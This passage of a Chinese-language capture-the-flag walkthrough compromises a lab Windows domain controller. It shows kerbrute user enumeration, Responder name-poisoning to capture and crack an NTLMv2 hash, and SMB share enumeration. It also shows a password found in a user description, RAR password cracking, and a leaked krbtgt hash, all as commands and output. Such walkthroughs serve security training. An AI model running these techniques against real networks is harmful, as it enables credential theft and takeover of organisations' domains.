ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 77859\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250613230723.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open tcpwrapped\n5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.65 seconds<\/code><\/pre>\n\u7206\u7834kerberos\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ..\/DC02\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc $IP \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt\n\n __ __ __ \n \/ \/_____ _____\/ \/_ _______ __\/ \/____ \n \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/ __\/ \/ \/ \/_\/ \/ \/ \/ \/_\/ \/ \/_\/ __\/\n\/_\/|_|\\___\/_\/ \/_.___\/_\/ \\__,_\/\\__\/\\___\/ \n\nVersion: v1.0.3 (9dad6e1) - 06\/13\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/13 03:11:28 > Using KDC(s):\n2025\/06\/13 03:11:28 > 192.168.10.101:88\n\n2025\/06\/13 03:11:29 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL\n2025\/06\/13 03:11:34 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL\n^C<\/code><\/pre>\n\u627e\u4e0d\u5230\u5c31\u522b\u786c\u627e\u4e86\u3002\u3002\u3002<\/p>\n
UDP\u4fe1\u606f\u641c\u96c6<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo nmap -Pn -sU -F $IP --max-rate 50 --min-rate 15\n[sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:14 EDT\nNmap scan report for soupedecode.local (192.168.10.101)\nHost is up (0.00088s latency).\nNot shown: 96 open|filtered udp ports (no-response)\nPORT STATE SERVICE\n53\/udp open domain\n88\/udp open kerberos-sec\n123\/udp open ntp\n137\/udp open netbios-ns\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.30 seconds<\/code><\/pre>\n\u76d1\u542c\u4e00\u4e0b\u770b\u770b\u662f\u5426\u4f20\u56de\u6765hash\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ping $IP \nPING 192.168.10.101 (192.168.10.101) 56(84) bytes of data.\n64 bytes from 192.168.10.101: icmp_seq=1 ttl=128 time=2.12 ms\n64 bytes from 192.168.10.101: icmp_seq=2 ttl=128 time=0.752 ms\n64 bytes from 192.168.10.101: icmp_seq=3 ttl=128 time=0.824 ms\n64 bytes from 192.168.10.101: icmp_seq=4 ttl=128 time=0.747 ms\n^C\n--- 192.168.10.101 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3043ms\nrtt min\/avg\/max\/mdev = 0.747\/1.109\/2.115\/0.581 ms<\/code><\/pre>\n\u4f46\u662f\u6ca1\u5f02\u5e38\u3002\u3002\u3002\u3002<\/p>\n
web\u5229\u7528nbns\u52ab\u6301NTLM hash<\/h3>\n
\u7528\u7528\u6237\u540d\u548c\u5bc6\u7801admin:nimda<\/code>\u6253\u5f00\u4e4b\u524d\u7684web\u9875\u9762\uff0c\u53d1\u73b0\u4e00\u4e2a\uff1a<\/p>\n<\/div><\/p>\n\nNetwork Share Heartbeat (\u7f51\u7edc\u5171\u4eab\u5fc3\u8df3) \u662f\u4e00\u79cd\u7528\u4e8e\u76d1\u63a7\u7f51\u7edc\u5171\u4eab\u8d44\u6e90\uff0c\u7279\u522b\u662f\u96c6\u7fa4\u73af\u5883\uff08\u5982Oracle RAC\uff09\u4e2d\u8282\u70b9\u95f4\u901a\u4fe1\u72b6\u6001\u7684\u673a\u5236\u3002\u5b83\u901a\u8fc7\u5468\u671f\u6027\u5730\u53d1\u9001\u548c\u63a5\u6536\u5fc3\u8df3\u5305\u6765\u786e\u8ba4\u8282\u70b9\u662f\u5426\u5904\u4e8e\u6d3b\u52a8\u72b6\u6001\u3002\ufeff<\/p>\n<\/blockquote>\n
\u5c1d\u8bd5\u8fdb\u884c\u76d1\u542c\u83b7\u53d6 NTLMv2hash<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u53e6\u4e00\u8fb9\u4f2a\u9020\u76d1\u542c\u5230\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo responder -I eth0 -v \n[sudo] password for kali: \n __\n .----.-----.-----.-----.-----.-----.--| |.-----.----.\n | _| -__|__ --| _ | _ | | _ || -__| _|\n |__| |_____|_____| __|_____|__|__|_____||_____|__|\n |__|\n\n NBT-NS, LLMNR & MDNS Responder 3.1.6.0\n\n To support this project:\n Github -> https:\/\/github.com\/sponsors\/lgandx\n Paypal -> https:\/\/paypal.me\/PythonResponder\n\n Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n To kill this script hit CTRL-C\n\n[+] Poisoners:\n LLMNR [ON]\n NBT-NS [ON]\n MDNS [ON]\n DNS [ON]\n DHCP [OFF]\n\n[+] Servers:\n HTTP server [ON]\n HTTPS server [ON]\n WPAD proxy [OFF]\n Auth proxy [OFF]\n SMB server [ON]\n Kerberos server [ON]\n SQL server [ON]\n FTP server [ON]\n IMAP server [ON]\n POP3 server [ON]\n SMTP server [ON]\n DNS server [ON]\n LDAP server [ON]\n MQTT server [ON]\n RDP server [ON]\n DCE-RPC server [ON]\n WinRM server [ON]\n SNMP server [ON]\n\n[+] HTTP Options:\n Always serving EXE [OFF]\n Serving EXE [OFF]\n Serving HTML [OFF]\n Upstream Proxy [OFF]\n\n[+] Poisoning Options:\n Analyze Mode [OFF]\n Force WPAD auth [OFF]\n Force Basic Auth [OFF]\n Force LM downgrade [OFF]\n Force ESS downgrade [OFF]\n\n[+] Generic Options:\n Responder NIC [eth0]\n Responder IP [192.168.10.102]\n Responder IPv6 [fd00:4c10:d50a:f900::1003]\n Challenge set [random]\n Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']\n Don't Respond To MDNS TLD ['_DOSVC']\n TTL for poisoned response [default]\n\n[+] Current Session Variables:\n Responder Machine Name [WIN-V59O5XD9V4P]\n Responder Domain Name [HEB4.LOCAL]\n Responder DCE-RPC Port [49647]\n\n[+] Listening for events...\n\n[SMB] NTLMv2-SSP Client : 192.168.10.101\n[SMB] NTLMv2-SSP Username : soupedecode\\websvc\n[SMB] NTLMv2-SSP Hash : websvc::soupedecode:27a657cc9b71fd69:5EC03D3DEAC5B45DCD4D9C5244B1B7EA:0101000000000000809FD74414DCDB017CC76FE000708FD30000000002000800480045004200340001001E00570049004E002D005600350039004F00350058004400390056003400500004003400570049004E002D005600350039004F0035005800440039005600340050002E0048004500420034002E004C004F00430041004C000300140048004500420034002E004C004F00430041004C000500140048004500420034002E004C004F00430041004C0007000800809FD74414DCDB010600040002000000080030003000000000000000000000000040000005B4315A789213EB0FAF2A77B432A0904E738F56279101A440BC0D08ED02CFE50A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310030002E003100300032000000000000000000<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C\/R [MD4 HMAC-MD5 32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\njordan23 (websvc) \n1g 0:00:00:00 DONE (2025-06-13 03:37) 6.250g\/s 6400p\/s 6400c\/s 6400C\/s 123456..bethany\nUse the "--show --format=netntlmv2" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u83b7\u5f97\u4e86\u4e00\u4e2a\u65b0\u51ed\u8bc1websvc:jordan23<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\nSMB\u670d\u52a1\u63a2\u6d4b<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p jordan23\nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [-] SOUPEDECODE.LOCAL\\websvc:jordan23 STATUS_PASSWORD_EXPIRED <\/code><\/pre>\n\u53d1\u73b0\u51ed\u8bc1\u8fc7\u671f\u4e86\uff0c\u662f\u4e2abug\uff0c\u8fd9\u548c\u524d\u9762\u5904\u7406\u529e\u6cd5\u4e00\u6837\u7684\uff0c\u8fdb\u884c\u4fee\u6539\u5bc6\u7801\u5c31\u884c\u3002<\/p>\n
\n- \n
\u53f3\u952ectrl<\/code>+delete<\/code>\u89e3\u9501<\/p>\n<\/li>\n- \n
esc<\/code>\u5207\u6362\u81f3\u9009\u7528\u6237\u754c\u9762 \u00d74<\/p>\n<\/li>\n- \n
Other users<\/p>\n<\/li>\n
- \n
Local or domain account password\uff08\u5361\u4f4f\u5c31\u6309\u4e0b\u4e0a\u4e0b\u952e\uff09<\/p>\n<\/li>\n
- \n
\u5bc6\u7801\u767b\u5f55\u754c\u9762<\/p>\n<\/li>\n
- \n
\u663e\u793a\u5bc6\u7801\u8fc7\u671f\u9700\u8981\u4fee\u6539<\/p>\n<\/li>\n
- \n
\u4fee\u6539\u5bc6\u7801<\/p>\n<\/li>\n
- \n
enter\u5373\u53ef<\/p>\n<\/li>\n<\/ul>\n
\u7136\u540e\u53d1\u73b0\u4fee\u6539\u6210\u529f\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u websvc -p hgbepass \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.101:445 Name: soupedecode.local Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ NO ACCESS Remote Admin\n C READ ONLY\n C$ NO ACCESS Default share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p hgbepass\nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [+] SOUPEDECODE.LOCAL\\websvc:hgbepass<\/code><\/pre>\n\u7136\u540e\u5c31\u83b7\u53d6\u4e86user.txt<\/code>\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U "websvc" \/\/$IP\/C \nPassword for [WORKGROUP\\websvc]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n $WinREAgent DH 0 Sat Jun 15 15:19:51 2024\n Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024\n DumpStack.log.tmp AHS 12288 Fri Jun 13 18:28:35 2025\n pagefile.sys AHS 1476395008 Fri Jun 13 18:28:35 2025\n PerfLogs D 0 Sat May 8 04:15:05 2021\n Program Files DR 0 Sat Jun 15 13:54:31 2024\n Program Files (x86) D 0 Sat May 8 05:34:13 2021\n ProgramData DHn 0 Tue Nov 5 16:44:31 2024\n Recovery DHSn 0 Sat Jun 15 22:51:08 2024\n System Volume Information DHS 0 Sat Jun 15 15:02:21 2024\n Users DR 0 Wed Nov 6 20:55:53 2024\n Windows D 0 Thu Nov 7 17:32:13 2024\n xampp D 0 Tue Nov 5 17:56:28 2024\n\n 12942591 blocks of size 4096. 10496839 blocks available\nsmb: \\> cd users\nsmb: \\users\\> ls\n . DR 0 Wed Nov 6 20:55:53 2024\n .. DHS 0 Tue Nov 5 18:30:29 2024\n Administrator D 0 Sat Jun 15 15:56:40 2024\n All Users DHSrn 0 Sat May 8 04:26:16 2021\n Default DHR 0 Sat Jun 15 22:51:08 2024\n Default User DHSrn 0 Sat May 8 04:26:16 2021\n desktop.ini AHS 174 Sat May 8 04:14:03 2021\n fjudy998 D 0 Wed Nov 6 20:55:33 2024\n ojake987 D 0 Wed Nov 6 20:55:16 2024\n Public DR 0 Sat Jun 15 13:54:32 2024\n rtina979 D 0 Wed Nov 6 20:54:39 2024\n websvc D 0 Wed Nov 6 20:44:11 2024\n xursula991 D 0 Wed Nov 6 20:55:28 2024\n\n 12942591 blocks of size 4096. 10487505 blocks available\nsmb: \\users\\> cd websvc\nsmb: \\users\\websvc\\> cd desktop\nsmb: \\users\\websvc\\desktop\\> ls\n . DR 0 Thu Nov 7 14:08:21 2024\n .. D 0 Wed Nov 6 20:44:11 2024\n user.txt A 32 Thu Nov 7 05:07:55 2024\n\n 12942591 blocks of size 4096. 10528272 blocks available\nsmb: \\users\\websvc\\desktop\\> get user.txt\ngetting file \\users\\websvc\\desktop\\user.txt of size 32 as user.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\users\\websvc\\desktop\\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat user.txt \n709e449a996a85aa7deaf18c79515d6a<\/code><\/pre>\n\u63d0\u6743<\/h2>\nsmb\u679a\u4e3e<\/h3>\n
\u53d1\u73b0\u4e86\u597d\u591a\u7528\u6237\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u641c\u96c6\uff1a<\/p>\n
fjudy998\nojake987\nrtina979\nxursula991<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p 'hgbepass' --users > log\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "fjudy998" \nSMB 192.168.10.101 445 DC01 fjudy998 2024-06-15 20:05:26 0 Music lover and aspiring guitarist \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "ojake987" \nSMB 192.168.10.101 445 DC01 ojake987 2024-06-15 20:05:25 0 Tech geek and gadget collector \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "rtina979" \nSMB 192.168.10.101 445 DC01 rtina979 2024-11-07 01:53:17 0 Default Password Z~l3JhcV#7Q-1#M \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep "xursula991" \nSMB 192.168.10.101 445 DC01 xursula991 2024-06-15 20:05:26 0 Yoga practitioner and meditation lover<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u65b0\u51ed\u8bc1\uff1artina979:Z~l3JhcV#7Q-1#M<\/code>\uff0c\u770b\u770b\u76ee\u5f55\u4e0b\u6709\u4e9b\u5565\uff0c\u53d1\u73b0\u51ed\u8bc1\u8fc7\u671f\u4e86\uff0c\u8fdb\u884c\u4fee\u6539\u5373\u53ef\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p hgbepass \nSMB 192.168.10.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.101 445 DC01 [+] SOUPEDECODE.LOCAL\\websvc:hgbepass \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u rtina979 -p hgbepass \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.101:445 Name: soupedecode.local Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ NO ACCESS Remote Admin\n C READ ONLY\n C$ NO ACCESS Default share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections <\/code><\/pre>\n\u7136\u540e\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U "rtina979" \/\/$IP\/C \nPassword for [WORKGROUP\\rtina979]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n $WinREAgent DH 0 Sat Jun 15 15:19:51 2024\n Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024\n DumpStack.log.tmp AHS 12288 Fri Jun 13 18:28:35 2025\n pagefile.sys AHS 1476395008 Fri Jun 13 18:28:35 2025\n PerfLogs D 0 Sat May 8 04:15:05 2021\n Program Files DR 0 Sat Jun 15 13:54:31 2024\n Program Files (x86) D 0 Sat May 8 05:34:13 2021\n ProgramData DHn 0 Tue Nov 5 16:44:31 2024\n Recovery DHSn 0 Sat Jun 15 22:51:08 2024\n System Volume Information DHS 0 Sat Jun 15 15:02:21 2024\n Users DR 0 Wed Nov 6 20:55:53 2024\n Windows D 0 Thu Nov 7 17:32:13 2024\n xampp D 0 Tue Nov 5 17:56:28 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\> cd users\/rtina979\/desktop\nsmb: \\users\\rtina979\\desktop\\> ls\n . DR 0 Sat May 8 04:15:05 2021\n .. D 0 Wed Nov 6 20:54:39 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\desktop\\> cd ..\nsmb: \\users\\rtina979\\> ls\n . D 0 Wed Nov 6 20:54:39 2024\n .. DR 0 Wed Nov 6 20:55:53 2024\n AppData DH 0 Wed Nov 6 20:54:39 2024\n Application Data DHSrn 0 Wed Nov 6 20:54:39 2024\n Cookies DHSrn 0 Wed Nov 6 20:54:39 2024\n Desktop DR 0 Sat May 8 04:15:05 2021\n Documents DR 0 Thu Nov 7 17:35:52 2024\n Downloads DR 0 Sat May 8 04:15:05 2021\n Favorites DR 0 Sat May 8 04:15:05 2021\n Links DR 0 Sat May 8 04:15:05 2021\n Local Settings DHSrn 0 Wed Nov 6 20:54:39 2024\n Music DR 0 Sat May 8 04:15:05 2021\n My Documents DHSrn 0 Wed Nov 6 20:54:39 2024\n NetHood DHSrn 0 Wed Nov 6 20:54:39 2024\n NTUSER.DAT AHn 131072 Fri Jun 13 18:32:06 2025\n ntuser.dat.LOG1 AHS 90112 Wed Nov 6 20:54:39 2024\n ntuser.dat.LOG2 AHS 0 Wed Nov 6 20:54:39 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Wed Nov 6 20:54:45 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Nov 6 20:54:39 2024\n NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Nov 6 20:54:39 2024\n ntuser.ini AHS 20 Wed Nov 6 20:54:39 2024\n Pictures DR 0 Sat May 8 04:15:05 2021\n Recent DHSrn 0 Wed Nov 6 20:54:39 2024\n Saved Games Dn 0 Sat May 8 04:15:05 2021\n SendTo DHSrn 0 Wed Nov 6 20:54:39 2024\n Start Menu DHSrn 0 Wed Nov 6 20:54:39 2024\n Templates DHSrn 0 Wed Nov 6 20:54:39 2024\n Videos DR 0 Sat May 8 04:15:05 2021\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\> cd documents\nsmb: \\users\\rtina979\\documents\\> ls\n . DR 0 Thu Nov 7 17:35:52 2024\n .. D 0 Wed Nov 6 20:54:39 2024\n My Music DHSrn 0 Wed Nov 6 20:54:39 2024\n My Pictures DHSrn 0 Wed Nov 6 20:54:39 2024\n My Videos DHSrn 0 Wed Nov 6 20:54:39 2024\n Report.rar A 712046 Thu Nov 7 08:35:49 2024\n\n 12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\documents\\> get Report.rar\ngetting file \\users\\rtina979\\documents\\Report.rar of size 712046 as Report.rar (7726.2 KiloBytes\/sec) (average 7726.2 KiloBytes\/sec)\nsmb: \\users\\rtina979\\documents\\> exit<\/code><\/pre>\n\u538b\u7f29\u5305\u5bc6\u7801\u7834\u89e3<\/h3>\n
\u53d1\u73b0\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u5c1d\u8bd5\u89e3\u538b\uff0c\u4f46\u662f\u53d1\u73b0\u6709\u5bc6\u7801\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nThe specified password is incorrect.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rar2john Report.rar > hash1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash1\nUsing default input encoding: UTF-8\nLoaded 1 password hash (RAR5 [PBKDF2-SHA256 128\/128 SSE2 4x])\nCost 1 (iteration count) is 32768 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nPASSWORD123 (Report.rar) \n1g 0:00:03:48 DONE (2025-06-13 04:29) 0.004368g\/s 224.4p\/s 224.4c\/s 224.4C\/s abby23..MANMAN\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nExtracting from Report.rar\n\nExtracting Pentest Report.htm OK \nExtracting m2-unbound-source-serif-pro.css OK \nExtracting main-branding-base.W9J-2zkF03j8TkriAGn1Tg.12.css OK \nExtracting dart.min.js OK \nExtracting google-analytics_analytics.js OK \nExtracting highlight.min.js OK \nExtracting main-base.bundle.IcW7tD43-xaHoBj2_P6wLQ.12.js OK \nExtracting main-common-async.bundle.SkTeOM8g4JVEInYAgrgW9Q.12.js OK \nExtracting main-notes.bundle.qVLVB-ghGjYQMo6npDHNjw.12.js OK \nExtracting main-posters.bundle.JMIo8YhZ0NhbVObiML4nWQ.12.js OK \nAll OK<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u62a5\u544a\uff1a<\/p>\n
<\/div><\/p>\n\u6cc4\u9732\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n
\nfile_svc:Password123!!<\/code><\/li>\nfile_svc:$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local\/file_svc*$afade2a48795f1f<\/code>\n\n- \u4f3c\u4e4e\u53ef\u4ee5\u7206\u7834\u51fa\u6765<\/li>\n<\/ul>\n<\/li>\n
SMB 192.168.56.121 445 DC01 [+] soupedecode.local\\ybob317:ybob317<\/code><\/li>\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f55cdc40bd8f5814587f7e6b2f85e6f:::<\/code><\/li>\n<\/ul>\n\u524d\u4e09\u4e2a\u4f3c\u4e4e\u90fd\u662f\u9519\u7684\uff0c\u7528\u6237\u6ca1\u89c1\u8fc7\uff0c\u6700\u540e\u4e00\u4e2a\u662f\u5bf9\u7684\uff1a<\/p>\n
